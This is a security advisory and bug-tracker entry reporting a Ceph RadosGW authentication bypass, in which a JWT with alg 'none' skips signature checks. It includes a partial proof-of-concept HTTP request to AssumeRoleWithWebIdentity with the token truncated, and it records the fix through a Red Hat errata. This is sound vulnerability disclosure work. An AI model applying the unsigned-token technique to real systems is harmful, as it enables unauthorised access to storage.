https://github.com/ceph/ceph/security/advisories/GHSA-5g9m-mmp6-93mq
Summary below:
Description
Summary
It is possible to bypass the CEPH rados authentication gw by proving an JWT as demonstrated in the PoC. In this case Keycloak is used as IdP.
This was found during a penetration test. Please assign CVE and credit me as finding this vulnerability. Do not mention the customer/organisation in public reports etc.
Details has also been provided to security before. As always, please fix this within 90 days as we plan to go public.
Details
It is possible to send an JWT that has "none" as JWT alg. And by doing so the JWT signature is not checked.
The vulnerability is probably in the RadosGW OIDC provider.
PoC
The HTTP request can be found below. But without the JWT:
POST / HTTP/2
Host: storage.xxx.se
User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1 X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0
Content-Type: application/x-www-form-urlencoded
Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78
Amz-Sdk-Request: attempt=1; max=3
Content-Length: 1508
Accept-Encoding: gzip, deflate, br
Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..
Impact
This was found during a penetration test. Please assign CVE and credit me as finding this vulnerability. We can also request CVE from Mitre.
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.
For information on the advisory (Important: Red Hat Ceph Storage 8.0 security update), and where to find the updated
files, follow the link below.
If the solution does not work for you, open a new bug report.
https://access.redhat.com/errata/RHSA-2024:10956
Comment 11Red Hat Bugzilla
2025-04-11 04:25:09 UTC
The needinfo request[s] on this closed bug have been removed as they have been unresolved for 120 days